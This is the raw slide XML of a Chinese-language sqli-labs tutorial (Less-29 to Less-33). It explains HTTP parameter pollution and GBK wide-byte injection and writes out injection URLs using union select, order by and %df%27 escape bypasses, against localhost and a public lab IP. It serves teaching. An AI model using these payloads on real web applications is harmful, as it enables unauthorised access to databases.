              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/lcamry/p/5762961.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>参数污染：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>getgetParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>("id")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取到的是第一个值，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>php/apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>$_GET["id"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>获取的是第二个值，那么第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>纯数字，第二个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12375241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Less-29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http://127.0.0.1:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>_/Less-29/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>index.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=1&amp;id=3‘  order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>说明数据有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列，而且第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值无法注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>_/Less-29/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>index.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=1&amp;id=113‘  union select 1,2, 3  --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>已经知道数据回显的位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1:8080/sqli_/Less-29/index.jsp?id=1&amp;id=113‘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此时我们已经取出数据库的名字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>接下来就是常规的操作，和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>基本一致</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2993636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1800" dirty="0"/>
              <a:t>1. http://127.0.0.1:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>_/Less-30/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>index.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=1&amp;id=1“ order by 3--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这里显示是正常的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的时候是不正常的，但是显示异常并没有显示报错的信息。说明无法使用报错注入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>接下里和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1:8080/sqli_/Less-30/index.jsp?id=1&amp;id=11111" union select 1,2, 3--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://127.0.0.1:8080/sqli_/Less-30/index.jsp?id=1&amp;id=11111“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接下来就是常规操作了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="517625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24691" y="2050472"/>
            <a:ext cx="12067309" cy="3796146"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1:8080/sqli_/Less-31/index.jsp?id=1&amp;id=-1 ") union select 1,2,3 --+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1:8080/sqli_/Less-31/index.jsp?id=1&amp;id=-1 ")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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>操作和前面的基本相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56491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8F6DF-B8B7-483B-B547-F3D75CDA356E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1794166" y="554182"/>
            <a:ext cx="5756562" cy="69273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宽字节注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA635FF-87FE-47D4-BA88-7BE6191C2AA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339436" y="2327565"/>
            <a:ext cx="11513128" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>参考文章： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/helloc0de/article/details/76180190</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/heiseweiye/article/details/82723478</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>宽字节： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>GB2312</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>GB18030</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>BIG5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Shift_JIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>一字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的现象，即将两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字符误认为是一个宽字节字符。  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中文、韩文、日文等均存在宽字节，英文默认都是一个字节。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的时候，当设置“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>set  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>character_set_client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>时会导致一个编码转换的问题。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>例子：   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id= 1’   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>    处理  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1 \’       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>进行编码   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1%5c%27         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>带入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id = \’ and XXXX  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时无法完成注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>                id=1%df’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>处理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1%df\’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>进行编码  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1%df%5c%27   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>带入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id =1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>運</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>’ and XXX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>此时存在宽字节注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>推荐解码网站： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.mytju.com/classcode/tools/urldecode_gb2312.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41208402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4"/>
            <a:ext cx="12067309" cy="4142509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit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法一：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-32/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这个时候返回的是正常数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-32/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回的是经过转义之后的数据，我们通过返回的数据可以看到，单引号已经被转义了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://121.199.30.46/Less-32/?id=1%df‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://121.199.30.46/Less-32/?id=1%df%27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时发现出现了注入点，这个时候我们继续</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://121.199.30.46/Less-32/?id=1%df’ --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这个时候返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://121.199.30.46/Less-32/?id=1%df‘ order by 4 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回与以前的关卡中同样的错误，接下来就是正常的注入操作了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9888590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法二：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%5c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代表的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>\ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时构造： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%5c %5c %5c %5c’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>只要是我们能将返回的结果中对于单引号没有转义字符进行处理即可。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>示例方法： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://121.199.30.46/Less-32/?id=-1%aa%5c' union select 1,2,3 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其余操作基本相似。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40773326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通过源码可得知： 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关中使用的是自定义的过滤，本关中使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
